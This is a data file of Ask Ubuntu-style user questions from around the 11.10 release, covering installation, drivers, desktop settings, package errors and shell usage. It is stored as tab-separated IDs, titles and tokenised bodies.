80455	`` no root file system defined '' error while installing ubuntu	i am new to linux/ ubuntu and just downloaded the v11 of ubuntu to learn linux . i faced this `` no root file system is defined '' error while trying to install it . this is how i was proceeding - downloaded ubuntu v11 from the ubuntu.com website , wrote the iso into a bootable cd , and then got into the linux installation process on restarting ; everything fine till here . in one of the screen during installation , there are three choices - install alongside windows , something else etc.. since i have windows 7 in the c drive , i selected the first option - `` install alongside another os '' . let me interrupt here to give my existing system details - harddisk size : 640gb . number of existing partitions - 5 c drive - label windows - 160gb - has windows 7 installed d drive - label linux - 160gb - does not have any data e drive - label backup - 100gb - has some data f drive - label entertainment - 100gb - has some data g drive - label work - 90gb - has some data all of the above are in ntfs format . in the screen that follows , an image is shown with 2 parts and each part is shown to have size equal to 80gb . there is a horizontal slider in the middle of these two images , with which i can resize the partitions . the right side partition is labeled linux . there is also an option to do 'advanced partitions ' . on clicking advanced partitions on the above screen , a new screen is shown in which the partitions existing in my computer are shown - but the labels are different . i see that there are two partitions with size = 160gb each ( as expected ) , and so i assumed that the first 160gb would be my existing c drive and the second on would be the partition which i had labeled as linux ( drive d ) . so i selected the linux partition and clicked on proceed/ install now , and then this error was shown - '' no root file system defined '' .. and i can not proceed after this . please let me know two things here- 1 . during the screen in point number 3 above , the image with slider was shown . which partition ( drive c : or d : or anyother ) is being referred to here ? which one am i actually resizing - is it the existing c : drive which has windows 7 installed already , that is getting shrunk and then ubuntu getting installed in the remaining space ? what does `` '' no root file system defined '' error mean ? how do i select the proper partition and continue with the installation ? ps . i had already partitioned my drives as mentioned above , and the d drive with 160gb was specifically left free for installing ubuntu . i would like to select d drive during setup and install ubuntu here , while still keeping the already installed windows7 in c drive . thanks !
80458	how do i install xulrunner-1.9.2 ?	i need it for redcar . after `` sudo apt-get install xulrunner-1.9.2 . '' got an error : '' package xulrunner-1.9.2 is not available , but is referred to by another package '' .
80459	backlight driver /sys/class/backlight has two entries ?	system : dell n4110 ubuntu ver : oneric my /sys/class/backlight has two entries acpi_video0 and intel_backlight ? is it normal to have two entries here ? when i try to change the screen brightness using fn + brightness key , the brightness changes with uneven steps . i 'm suspecting the dual entries in the /sys/class folder is pointing to some issues ?
80464	how to update adobe 's software unattendedly ?	i would like to use unattended-upgrade to update the adobe reader , flash player and everything else of the canonical partners . there fore , i added in /etc/apt/apt.conf.d/50unattended-upgrades unattended-upgrade : :allowed-origins { `` $ { distro_id } $ { distro_codename } -security '' ; `` $ { distro_id } $ { distro_codename } -updates '' ; `` canonical $ { distro_codename } '' ; // `` $ { distro_id } $ { distro_codename } -proposed '' ; // `` $ { distro_id } $ { distro_codename } -backports '' ; } ; sudo unattended-upgrade -- dry-run -d says initial blacklisted packages : starting unattended upgrades script allowed origins are : [ 'o=ubuntu , a=oneiric-security ' , 'o=ubuntu , a=oneiric-updates ' , 'o=canonical , a=oneiric ' ] checking : acroread-common ( [ `` < origin component : 'partner ' archive : '' origin : '' label : '' site : 'archive.canonical.com ' istrusted : false > '' ] ) checking : adobe-flash-properties-gtk ( [ `` < origin component : 'partner ' archive : '' origin : '' label : '' site : 'archive.canonical.com ' istrusted : false > '' ] ) checking : adobe-flashplugin ( [ `` < origin component : 'partner ' archive : '' origin : '' label : '' site : 'archive.canonical.com ' istrusted : false > '' ] ) checking : adobereader-deu ( [ `` < origin component : 'partner ' archive : '' origin : '' label : '' site : 'archive.canonical.com ' istrusted : false > '' ] ) checking : handbrake-cli ( [ `` < origin component : 'main ' archive : 'oneiric ' origin : 'lp-ppa-stebbins-handbrake-snapshots ' label : 'handbrake snapshots ' site : 'ppa.launchpad.net ' istrusted : true > '' ] ) checking : handbrake-gtk ( [ `` < origin component : 'main ' archive : 'oneiric ' origin : 'lp-ppa-stebbins-handbrake-snapshots ' label : 'handbrake snapshots ' site : 'ppa.launchpad.net ' istrusted : true > '' ] ) checking : sopcast-player ( [ `` < origin component : 'main ' archive : 'oneiric ' origin : 'lp-ppa-ferramroberto-sopcast ' label : 'lffl sopcast ' site : 'ppa.launchpad.net ' istrusted : true > '' ] ) pkgs that look like they should be upgraded : fetched 0 b in 0s ( 0 b/s ) blacklist : [ ] instcount=0 delcount=0 brokencout=0 no packages found that can be upgraded unattended and it wo n't update . how can i update the third-party software automatically ?
80465	recursively rename files - oneliner preferably	i found this answer how do i ... but it simply does n't work - it did not rename any file for unknown to me reason before i started to search around i thought that it should be easy task even for novice penguin , but it does n't seem so for me . for example , i simply ca n't tell ls to list all *.txt in all subfolders , which was surprise to me ( without grep or similar ) . then i found find and find . -name name_1.txt lists files fine , but for f in $ ( find . -name name_1.txt ) ; do echo `` $ f '' ; done splits whole file paths with space as separator , so it 's unusable to pass that output to some command like mv or rename i want to ask whats wrong with above command and if possible some nifty oneliner so i can recursively rename name_1.txt to name_2.txt
80467	why did apache stop working after adding two sites ?	i wanted both redmine and mercurial on localhost/redmine and localhost/mercurial . redmine is a ror application that runs on mod_passenger module and mercurial runs on a cgi script . i should be able to use both on a single server right ? i got redmine to work fine . then i followed the steps for mercurial . then i enabled that site . and neiter site works . i did a2ensite those two sites and restarted apache , but both domains now give me a 404 . site config for redmine taken from http : //www.redmine.org/projects/redmine/wiki/howtoinstallredmineonubuntuserver < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /var/www servername myservername rewriteengine on rewriterule ^/ $ /redmine [ r ] < directory /var/www/redmine > railsbaseuri /redmine passengerresolvesymlinksindocumentroot on < /directory > errorlog /var/log/apache2/error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog /var/log/apache2/access.log combined site config for mercurial taken from http : //www.isnull.com.ar/2010/03/how-to-install-mercurial-on-debian-or.html < virtualhost *:80 > servername mercurial.server documentroot /var/www/mercurial/http scriptalias /cgi-bin/ /var/www/mercurial/cgi-bin/ scriptaliasmatch ^/hg ( . * ) /var/www/mercurial/cgi-bin//hgwebdir.cgi $ 1 < directory /var/www/mercurial/cgi-bin > allowoverride none options +execcgi -includes order allow , deny allow from all < /directory > < directory /var/www/mercurial/http > options followsymlinks allowoverride authconfig directoryindex /hg order allow , deny allow from all < /directory > errorlog /var/log/apache2/error_mercurial.log customlog /var/log/apache2/access_mercurial.log combined < /virtualhost >
80471	how can i rearrange the sidebar in nautilus ?	it seems like after updating to oneiric , the order of nautilus ' sidebar has changed so that the least used group of bookmarks ( devices ) is at the top while the most used ( computer ) is at the bottom . is this normal or did something get botched in my setup ? can i change it ? thanks ! image here of my current , poorly arranged sidebar here :
80472	what happens with my settings , programs and files if i upgrade ubuntu ?	i currently use ubuntu 11.10 . when i update on version 12.04 in april 2012 what will happen to my settings , programs and so on ? will these be gone or is there a way i keep it ?
80474	how can i switch to other icon sets in unity without using the gnome tweak tool	i recently downloaded and installed the faenza icon set on my laptop ( through its creators ppa ) . in order to be able to use it , though , i had to install the gnome tweak tool as well , which comes bundled with the gnome-shell . the thing is , i have no intention of using the gnome-shell . is there a simpler way of customizing icons in ubuntu ?
80484	how to find out more about encrypted partitions ?	i just installed ubuntu 10.04 with the alternate cd . i 'm using a encrypte lvm . so all my partitions should be encrypted . but how do i find out , if they are encrypted and how ( aes ? , bit ? , ... ) thanks for help ... sam
80486	on which partition is my bootloader installed ?	how can i check on which partition ubuntu installed my bootloader from within ubuntu ?
80488	sluggish/unresponsive trackpad on pre-unibody macbook pro	i am running ubuntu natty narwhal on pre-unibody macbook pro ( 2007 i believe ) . there seems to be a problem with trackpad - it barely works , in order to move cursor you have to move your finger a lot , and it terminates the 'gestures ' abruptly - say you are moving the cursor with your finger and out of the blue it just stops , although the finger is still in contact with the surface of the trackpad . those issues seem to dissapear as soon as i boot mac os x , so i suspect it is something ubuntu-specific . also , if i try to move the cursor with not just fingertip but increase the contact area , it seems to work just fine , although it is hardly convenient .
80491	filezilla not showing on alt-tab	i have latest filezilla : 3.5.2 after the launch , when i press alt+tab filezilla is icon is not present on switcher nor in the unity launcher ( once i switch to other app i ca n't switch back ) . how can i fix this ?
80493	ca n't install nodejs-dev : unmet dependencies	i need to install nodejs-dev package . but sudo apt-get install nodejs-dev throws the following packages have unmet dependencies : nodejs-dev : depends : nodejs ( = 0.4.9-1ubuntu3 ) but 0.4.12-1chl1~natty1 is to be installed e : unable to correct problems , you have held broken packages . so ... what can i do about this error ? i run ubuntu 11.10
80499	installed ubuntu in a low specs pc and it is too slow , even with lxde	i 'm new with linux and started with ubuntu 11.10 , i installed it in my pc ( core2duo 2ghz , 512mb ram ddr2 , integrated video in motherboard ) , i know the requirements for unity are 1gb ram so i decided to download a desktop environment more lightweight , so i installed lxde , it loads very fast , compared to the 3.5 min from login screen to open desktop in unity , but it freezes every time i open a single program , i ca n't even navigate in internet , it freezes , sometimes for a pair of minutes and the graph at bottom right is all green as if iyt were using 100 % cpu , it happens with every program . as additional data it takes 3+ min to get from boot system selection screen to login screen and 3.5 min more to get into ubuntu with unity , with lxde it turns to 30 secs aproximately . is ubuntu + lxde desktop environment package = lubuntu ? or should i download lubuntu directly instead ? i installed some other desktop environments , as gnome but it does n't log in , the screen just turns grey . should i get an older ubuntu version ? i 'm thinking about uninstalling ubuntu but i 'll try to deplete the options , thanks for your support .
80500	why ca n't i install a plugin for compiz fusion ?	i am interested in installing experimental and unsupported plugins for compiz-fusion from git . my primary interest is in the plugin snow . i followed the instructions on the compiz website , and created a directory called compizplugins in my home folder . after that , i navigated to that directory using terminal , and ran this command : git clone git : //anongit.compiz.org/fusion/plugins/snow after that , i navigated to the directory ~/compizplugins/snow , and ran the command make . but all i got was this error : convert : snow.xml.in - > build/snow.xml bcop'ing : build/snow.xml - > build/snow_options.h bcop'ing : build/snow.xml - > build/snow_options.c make : *** no rule to make target `build/snow.lo ' , needed by `c-build-objs ' . stop . so i ran the command make install . still , i got the same error : make : *** no rule to make target `build/snow.lo ' , needed by `c-build-objs ' . stop . can someone tell me why ca n't i install this plugin ? i need to know what i was doing wrong and how to install the plugin snow without encountering any errors ( using git ) .
80502	how do i automount usb drives to /media/volume_label on a server ?	as mentioned in the title , i 'd like to automount usb drives to /media/volume_label in ubuntu server 11.10 . i 'd like to make this happen like it does with ubuntu desktop , but in an ubuntu server installation . there 's an old script here , but i do n't think it 's up to date . once the volumes are automounted , i 'll share them with samba and perhaps upnp .
80503	could i instal edubuntu in a piv 1.4ghz , 512mb rambus , 64mb geforce 4 mmx ?	well just that , i want to resurrect my old piv to give to my kids so they can have fun and learn , could i instal edubuntu in a piv 1.4ghz , 512mb rambus , 64mb geforce 4 mmx ? or should i look for another education-oriented linux ?
80507	youtube videos suddenly all report `` invalid parameters '' and wo n't play	running 11.10 , with up-to-date flash ( 11.1.102.55 , which the flash site agrees is the up-to-date version ) . every youtube video reports a blank screen with the words , `` invalid parameters '' : i 've tried fiddling with the player `` hardware acceleration '' setting , and that has no effect . similarly , i 've clicked and un-clicked and re-clicked the `` storage '' options in the global settings thing , also to no effect . i have n't seen this in any google searches ( though there are other problems described involved the `` invalid parameters '' message ) which makes me think it 's a recent phenomenon . edit — hmm , fails in firefox but works in chrome ...
80518	ubuntu software center does not allow changes to software sources	the checkboxes that appear to be changeable under the edit / software sources dialog box can not be changed . i click on them and they just turn gray and stay at their current setting . update : when i run software-center from a terminal window and try to change one of the checkbox settings , i get : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/softwareproperties/gtk/softwarepropertiesgtk.py '' , line 649 , in on_isv_source_toggled self.backend.togglesourceuse ( str ( source_entry ) ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 143 , in __call__ **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 630 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : com.ubuntu.softwareproperties.permissiondeniedbypolicy : com.ubuntu.softwareproperties.applychanges these things happen instead of it properly prompting me for a password ( for root privs ) .
80519	why `` cd .. '' does n't work in this if	pwd | grep 'database $ ' if [ `` $ ? '' = 0 ] ; then echo `` has db '' cd .. cd .. echo `` after has db '' fi after i execute it i see has db after has db and i 'm still in the same dir , how to fix it ?
80520	how do i fix overheating and short battery life on a vaio vpcea23en with an ati radeon hd 5145 ?	i am using a vaio vpcea23en with an ati radeon hd 5145 graphics card . i have 3 gb ram and a core i3 2,26 ghz processor . my laptop gets very hot very quickly . battery life is also much shorter than in windows 7 . i get less than an hour under ubuntu and about 3 hours under windows . how can i fix both issues ?
80522	how do i enable opacity/saturation/brightness controls in gnome-shell ?	i 've just installed gnome-shell in ubuntu 11.10 , but i miss one of the compiz settings greatly.. the ability to use my scrollwheel to change window opacity . i do n't really want to change back to compiz/gnome classic just for this one ability , as i rather like the direction gnome shell is going with the overview page and workspace management . please tell me this is possible , someone !
80524	will 64 bits flash be available in 11.10 ?	in previous versions i was able to install 64 bit flash from the sevenmachines ppa , it was removed so i thought ubuntu added it to official repos , but it installs the 32 bit version and the nspluginwrapper . any way to install the 64 bit version ?
80525	dns server not responding	i have dns server i have configure it from ubuntu bind9 help i have a record of ubuntu-server.local i am unable to ping it from ubuntu machine i am able to ping it from windows 7 machine ... & working 100 % dig
80527	can i change gedit editor preferences according to the identified programming language ?	i am currently using gedit for two programming projects . one is done with python , the other one with java . in the java project i have to use tabs and in the python-one i have to use spaces . can i configure gedit in a way that i do n't have to manually change the tab/space settings ?
80531	a way for an upstart event to be sent whenever ecryptfs homedir mounted/unmounted ?	i have an encrypted homedir ( ecryptfs ) and i 'm wanting to run a private mysql daemon with the database files in my homedir . the daemon should be started whenever the homedir is mounted , and stopped before the homedir is unmounted . it seems i have to write an upstart script , which does n't seem too hard ; the problem is triggering it . is there already any upstart event that is sent on these occasions ? or must i insert an `` initctl emit '' somewhere ? where ? it seems the encrypted homedir is mounted whenever i either open my gui session or ssh to my account . is there a common place in these two processes where i might insert code ? ( i do n't want to patch and compile any c code , just insert maybe a few lines somewere . ) david
80533	mouse disappears over gvim after installing nerdtree	i installed nerdtree and now the mouse disappears over gvim . is there any .vimrc setting that would fix this ? launchpad bug same question @ stack overflow
80534	broken gnome panel after update	like every single update on ubuntu system , my graphical system is completely broken after updating to version 11.10 as shown in the image , the date is in the middle of the panel , there are many icons missing ( network connection icon , skype ) there 's no right click menu when i try to right click on the panel and many programs do n't have their menus ( file , edit , view ... those things ) . how do i fix this ? i have gnome-panel , i do n't want unity and i 'd rather install windows 95 before i switch to it .
80539	this 11.10 release of ubuntu is very unstable	why does n't iceauthority recognize me ? ' '' `` chromium or audit configuration open anymore ? is this os always so unstable ? why are there so many copies of one thing ? my mouse is not working right .
80545	ubuntu 11.10 with kde installed does not prompt for elevation for privileged ops in all apps	i installed the kde window manager on top of ubuntu 11.10 and while i am using kde , i do not get an elevation dialog when i try to perform tasks that require root privileges . instead , the operations silently fail , unless i launch apps from a terminal , in which case i get errors like : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/softwareproperties/gtk/softwarepropertiesgtk.py '' , line 649 , in on_isv_source_toggled self.backend.togglesourceuse ( str ( source_entry ) ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 143 , in __call__ **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 630 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : com.ubuntu.softwareproperties.permissiondeniedbypolicy : com.ubuntu.softwareproperties.applychanges or from the muon package manager , an error dialog such as : does anyone know what i need to do to fix this , so that i get a proper dialog asking for elevation ? otherwise , i have to start each app that may need root privs with sudo from a terminal or gksudo . thanks
80546	modal popup showing on the wrong monitor	on ubuntu 11.10 , i 'm seeing modals from many applications show up on a different monitor from their parent application . in this example , firefox , the application on the right most monitor , has popped up a modal dialog in the center monitor . you 'll notice that it is not just on the wrong monitor , it 's also positioned horizntally against the left edge of that monitor . vertically , it 's centered . this happens for at least firefox , eclipse and gedit modals . it seems like it 's all applications . it does n't matter which monitor the parent application is on , the modals are always on the left edge of the center monitor .
80552	how to share my whole tree ( host : windows 7 ) with my virtual machine ( guest : kubuntu 11.10 ) ?	i am running vmware workstation . i would like to share my whole tree with my guest os . currently i am sharing a directory using the line below .host : / /home/username/documents vmhgfs auto , rw , exec , utf8 0 0 i already tried using c : / but something i am missing in order to mount it properly . any suggestions ? thanks
80555	upgrade from 10.10 to 11.04 to 11.10 . x starts , unity desktop not there	i upgraded my ubuntu desktop 10.10 system to 11.04 and then 11.10 . now , when i start ubuntu , the unity desktop does n't start correctly . here 's what i do : start computer i log in via the gui login screen the x window system starts . i can see an arrow icon for the mouse , and can move it around the screen . nothing else starts . there are no desktop icons , no launcher , no taskbar , etc . right clicking on desktop does nothing . i 've tried some common keyboard shortcuts ( `` alt-tab '' `` ctrl-alt-t '' `` ctrl-alt-backspace '' ) but nothing happens . if i go to another virtual console , and run the command unity , the unity desktop will start on my primary x desktop . however i 'm seeing many problems like windows which are only half-drawn , some applications run without the familiar `` minimize , maximize , close '' what 's happening here ? it seems that the x window system started , but unity did not start ? how can i debug this ?
80556	how many desktop environments are available for ubuntu ?	how many are the desktop environments provided and supported by ubuntu ?
80562	install button in the software center is grayed out when trying to install .debs without an internet connection	i just installed ubuntu 11.10 from a usb stick . after installation , none of the software which i had collected and run on 11.10 or 11.04 runs on it . even my newly downloaded opera or chrome installations does not work . i do not have a internet connection . whenever i try to install any .deb file by double clicking it , software center opens up but the install button is grayed out .
80564	should the root folder ( /root ) be empty ?	i have been moving files around to prepare for a remaster . i put some files into root , which i though might help an issue i was having with auto login in live mode . anyway , putting files into root changed nothing , thing is i cant remember if root was empty or not when i started so , should the root folder be empty , and if not , what should be in there ? thanks
80570	how to make nfs mounts available while offline ?	problem : i work on a notebook and while at work i have access to many nfs mounted drives . when i get home they are obviously not available . windows 7 solution : my business partner uses windows 7 and maps the folders via samba . windows 7 has a very nice feature that let 's he make these folders available offline . so when when he connects to the work network the changes get synchronized ! question : is there a way to mimic that in ubuntu ? what i have now : server to local sync : i have added rsync entries on my crontab to copy server folders = > local folders every five minutes . when at work i used the nfs mapped folders and while outside work i use the local copies . when i get at work i manually run a script that syncs local folders = > server folders . problems with my setup : slow startup when not at work ( i guess do to the fstab trying to map the server folders ) no conflict checking/managing i have to remember to sync manually and be careful because of the different file locations recent files do not work between work and home
80571	ubuntu 11.10 in virtualbox does not show anything on the desktop	the buttons that should be visible still function ( as shown by the drop down menu i clicked ) . my host is windows 7 . virtualbox settings any help ?
80574	is there a way to turn off the drag to maximize thing ?	when you move a window in 11.04 classic desktop and the mouse goes over the top of the window it gets auto maximized . is there a way to disable this ? how to turn off compiz 's `` drag to maximize '' behaviour ? this question is about the same thing , but i do n't use unity or 11.10 that 's why that answer wont work .
80576	ati driver version 11.11 and gnome-shell	i just installed the latest ati graphic drivers version 11.11 , by first removing the old ati drivers from jocky . the installation went smooth and afterwords i ran the commando sudo aticonfig -- initial -f and restarted the computer . i also installed gnome-shell . before when i was using gnome-shell with the default ubuntu ati-properiataty drivers installed by jockey , all the text in gnome shell was messed up . now the text looks normal but every time i try to open the `` start-menu/dashboard '' the screen flickrs/flashes/blinks a few times . is there a way to resolve this issue ? also , how can i confirm that it is the latest ati drivers that are activated ?
80578	is there a settings manager available for mutter ?	is there a gui settings manager for mutter ? something where i can adjust the window shadow size , or the hot corners , or opacity , etc ...
80581	i need to grant permission to my export directory to write to webserver , but i do n't know what that is	i am installing a rather complicated program that writes to a directory and this directory needs to be able to write to my webserver . my instructions say this : grant php/export directory permission to write to webserver : sudo chown www /usr/local/share/stacks/php/export # this command assumes your webserver is www so ... i tried that with www and that clearly did n't work . it says that www is an invalid user . any idea what i 'm supposed to put in there ? how do i figure out what my webserver is . i have apache2 , if that matters , and mysql is running ( does that matter ? ) . this is a dedicated linux machine running 11.10 . sorry if this question is a bit dumb . i 'm still learning linux , and i suspect that these instructions are intentionally obtuse because they would prefer to be paid to run these analyses for you instead of running them yourself .
80583	lightdm resolution when using two monitors	my two monitors run on different resolutions ( laptop 1440x900 , hdmi 1920x1080 ) . i set them up as an extended desktop and they work just fine however , while logging in , the greeter appears to be set to `` mirror displays '' and seems to be running at a lower resolution on both screens . this does not only look bad but makes my hdmi monitor turn itself of and on again ( it does that with unsupported resolutions ) the problem appeared after i did a fresh install of oneiric , it worked just fine on natty . the laptop is a dell inspiron 1525 that came with ubuntu and it has an intel graphics chip : 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c )
80589	what are some of the issues with ccsm and why would i want to avoid it ?	i 've seen some people complaining about how unstable compizconfig settings manager ( `` ccsm '' ) is and how it can break people 's desktops if they 're not careful . what are some of the known problems with ccsm ? i 'd like to decide whether or not it 's worth the risk for me .
80592	how do i install tar bz2 and gz files ?	i do n't know how to install .tar , .bz2 and .gz packages . for example how do i install this ?
80598	how can i install photoshop cs5 ?	i copied all of the files like in this tutorial , but i have no luck launching ps . i also tried running the installer with wine , but needed air and it would n't connect to the adobe servers . also , i ( think i ) removed all of the libraries i installed with winetricks ( except for the vc++ ones ) and deleted the files i copied from my windows machine . this is all perfectly safe , right ?
80600	how to configure clicking a launcher icon minimizes all related apps	lets say i have 4 terminals opened . if i click the terminal launcher icon it maximizes all terminal windows . if i click again it shows all of them in a windows lists fashion so i can click a specific window from the list to go to it . but how can i click again to minimize/hide them all .
80601	how to enable 3d acceleration under vmware workstation 8 ?	i saw there are similar questions , but i do n't think they answer exactly my questions . did anyone managed to get 3d acceleration work under vmware workstation 8 ? i have vmware 8.01 installed on ubuntu 11.10 . the guest i am trying is also ubuntu 11.10 . i manually installed vmware-tools and it went well , except the x-config part was skipped as it said the distribution driver is used . the guest runs well but it seems fall back to 2d mode . does any one has any idea how to enable 3d acceleration under vmware workstaion with linux guest ?
80604	safety of installing ubuntu alongside windows	is it really safe to choose the `` install ubuntu alongside windows '' option from the ubuntu installation program ? i never used that option , instead i used other tools such as partition magic or windows 7 's disk tool to resize my partitions . since i 'm going to install ubuntu across a lot windows ( xp , vista and 7 ) machines . it would not be nice to damage those windows partitions . what is your experience ? can i use this feature without concerns ?
80605	is there a better way to run ubuntu from usb disk	i have an old laptop with a broken hard drive controller and am running the previous ubuntu from a usb . i installed this as per standard instructions by running some program that copied the live cd to the usb . this has had a few problems , it seems like it was just made for trying and not for everyday use . ideally i would like to do a proper install to the usb disk instead of just running off the installer disk . is there a way to do this ? the main problems i have are : when adding mounts to fstab it gets overwritten on each reboot when installing updates the kernel can not be updated
80612	is there a way to configure the `` super w '' effect ?	i 'd like to configure the `` super w '' effect , is it possible ? i ca n't find it in the ccsm . using unity 3d in ubuntu 11.10 . thank you .
80615	am i able to set unity 's dash full screen as default ?	i 'd like to click on the ubuntu buttom and see the dash in full screen as default . am i able to do it using ubuntu 11.10 and unity 2d ?
80620	how to open ole2 file format document	i received a file that is .ole2 format by email and i ca n't get it open . when i try to open it with document viewer ( default pfd program ubuntu ) it says it ca n't support it . i searched in the software center for ole2 , and it returned a program called ripole . it says it opens that format , but you have to run it in the terminal and i do n't know how . does any one know how to open ole2 documents ? or do you know how to work ripole ?
80623	how to disable alt+click from moving windows in unity 2d ?	how can i disable the alt+click combination from moving windows in ubuntu 11.10 ( unity-2d ) ?
80624	random kubuntu freeze up	i 'm kinda new at ubuntu/kubuntu , and i had a few issues . for whatever reason , and at random times kubuntu locks up and i can not use either mouse nor keyboard . i have tried jumping to terminal mode , but even that does n't work . actually , while i was typing this , it crashed and i had to switch to my eee pad . i 've searched google , ran diagnostics , and tried to read system logs , with little luck . i think the problem may lie in my graphics , but i 'm willing to do anything to fix it . if it helps at all , when i ran the diagnostics my pc failed the `` graphics/display '' category .
80627	how can i change the icon of an application in the unity launcher ?	i 'm trying to change the icon of a specific application ( pidgin ) in my ubuntu 11.10 unity launcher . i have tried searching in the options and in the compiz settings but could locate no option for changing individual icons . i can change the theme but that 's not what i want . i am willing to edit configuration files to get this change . it does n't have to be a ui solution .
80637	wacom bamboo connect ctl470 `` no tablet detected ... ''	wacom bamboo connect ctl470 - `` no tablet detected ... '' i downloaded and attempted to install drivers and software -- i am relatively new in ubuntu and downloaded , extracted , ran in terminal but could not successfully install drivers and software for this device . all of this took up a good deal of space on the drive . manual compilation failed . i need some help . how do i install so as to use this device ? or please direct me to a suitable ( relative beginner ) `` how to '' . i have downloaded several packages but the install fails in software center and synaptic . system : hp a1220n intel pentium 4 cpu 2.93 ghz os type 32 bit ubuntu 11.10
80638	how to disable auto power off of usb devices like usb mouse ?	i do n't know how , but somehow automatic power-off of usb devices got accidently enabled . now my usb mouse goes off even if it 's idle for 2-3 seconds . it 's really irritating . help ? ! ! ! ! ! p.s . this happened after i installed powertop and powernap . may be it has something to do with these two .
80648	slower start , hard drive makes strange sound ?	a few days ago , after login the hard drive did n't make any sound and i could open any program very fast . but now the disk sounds like it 's doing some i/o readings ( like a crackling noise of some sorts ) and the programs take longer to open up . what could be the problem ?
80651	linux distributive with global menu and ubuntuone for netbook	i like very much global menu in previous versions of ubuntu . but unity is too slow for my eee pc . so now i am looking for some alternative desktop environments or distributions where there is global menu available . but at the same time there should be ubuntuone service working too , as i use it pretty often . could you , please , suggest what should i try out ? i also use keyboard shortcuts very much and so i guess they should be configurable , and try not to use touchpad at all . so big icons like in gnome-shell and unity are not a good option .
80652	can i remove the latest ubuntu version without having to reinstall the old version ?	i was using the 2.6 kernels with no problems , but when i updated to the 3.0 kernel , my bootup failed . i can manually boot with ctrl+alt+f1 > startx and my login , but admittedly , i googled this and have no idea what i 'm really doing . i have been trying to figure out how to go back to the old version , and eventually figured out the grub menu -- i booted from all three 2.6 ( .8 , .10 , and .11 ) editions of the previous version of ubuntu but they all had the same error as the 3.0 kernal . i can get logged in manually once the boot fails , but when i get to my desktop , wireless is not responsive and will not connect , and portable hard drives do not mount and/or are unresponsive . the previous version worked perfectly . i use an asus netbook . it 's an eee pc . i do n't have two oss on it . i had to go to another computer to get to the forum ... if the solution is simple , i just do n't know what it is .
80655	how can i check dependency list for a deb package	how can i check dependency list for a deb package . i am running ubuntu 11.10 and i have backed up all deb packages from var/cache/apt/archives . i want to format my pc and re-install selected applications only . also how can i get the list of installed packages and dependencies .
80657	gtk equivalent to ms spy++	spy++ comes with paid version of ms visual studio as utility that gives you a graphical view of the systemâs processes , threads , windows , and window messages . and it 's not only utility on win32 that offers this feature , but i use it as popular example . it lists all ui elements of all running applications , and user can use `` find tool '' to locate ui element of interest and get response dialog with versatile information about that object , like ui control name , text contents , and many other data of potential interest to a programmer . i 'm interested in similar gtk application which can at least return gtk ui element ( widget ) name and extracted text contents of that element of arbitrary running process . i could n't find anything related using google
80660	missing firmware on a broadcom bcm4322	i 'm a new ubuntu user ( 11.10 ) . i do n't know how to connect wireless network . could you possibly help me ? network 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4322 802.11a/b/g/n wireless lan controller [ 14e4:432b ] ( rev 01 ) i 'm so sorry to take your time , but thanks a lot !
80663	computer suddenly wo n't boot - stops at a flashing prompt	i have been running ubuntu on my computer for a long time , and i have been using 11.10 since it became available in october . suddenly , this morning , when i rebooted , the computer would not reach the log in screen . i go through the standard post boot sequence , and i also get a splash screen for my nvidia graphics card , so at least most of the hardware seems to be working . after that , all i get is a flashing text prompt - one blinking white underline character on a screen that is otherwise completely blank . i do n't think it is even reaching grub . no key input is possible . i have tried various key combinations to try and initiate some kind of interface , be it command line or anything else . the only key combination that works is [ ctrl ] + [ alt ] + [ delete ] to reboot . i realize this is likely to be a hardware problem , but it could be an ubuntu problem ( ? ) , so i 'm hoping for a specific set of troubleshooting steps so i can diagnose and repair this issue . my current suspicion is that one of the drives in my 2 disk software raid has failed ( even though they should be too new for that ) . however , this computer is critical to my work , so i 'd like to invite advice on any possibilities so as to waste as little time as possible in fixing this machine .
80664	better way to set up samba bridge ?	i have an old ubuntu laptop hooked up to between my wireless network and a wired media player box . i had previously shared my wireless network connection so the media player had internet access ( ie . via nat ) because it was a different subnet it could not access the file shares on the wireless network . to get around this i mounted the drives from the wireless network on the laptop and re-shared them with samba . this worked ok but had some drawbacks , it seemed slow and if network computers were turned off when the laptop rebooted i had to manually mount the shares . i 've just re-installed with the latest ubuntu and was wondering if there is a better way to do this . is there some way to bridge so the media player appears to be on the wireless network ? would this give better performance ? any other options ? i 'm also thinking there might be some samba options that could buffer files ? edit : to bridge multiple interfaces i believe you can do something like : brctl addbr br0 brctl addif eth0 brctl addif eth1 then you configure the address of br0 this gives the error : `` operation not supported '' . according to this post it is not simple to bridge wired and wireless networks .
80665	how can i direct apt-get to download package and its dependencies to some other location ?	how can i direct apt-get install package_name to download package and its dependencies to some other location instead of /var/cache/apt/archives ?
80667	is there an android-like live wallpaper for unity ?	is there any program which can run a 'live wallpaper ' like the ones in android ? i 've searched quite a bit but have n't found anything usable yet . anibg looks promising , but it is not working in 12.10 .
80672	what perl version will be in 12.04 lts	pretty soon the new 12.04 version of ubuntu will be released . my question is what version of perl language will be in this distribution . and my second version where can this information be found .
80673	is it possible to downgrade 11.10 kernel version to 2.6 ?	is it possible to downgrade the kernel ( oneiric ) to the version used by 10.10 ?
80675	why is banshee miro guide slow ?	just updated banshee to 2.2.1 in ubuntu 11.10 . miro guide is still unusable and slow , and freezes . the play button in the sound indicator menu keeps turning round and round and round ! what 's the problem with banshee ?
80676	how to move files older than x to another folder ?	how do i move files older than 30 days from folder /storage/current/dbdumps/ to /storage/archive/dbdumps ? i tried : find /storage/current/dbdumps/ -type f -mtime +30 -exec mv ' { } ' /storage/archive/dbdumps \ ; but seems invalid in ubuntu 11.04 .
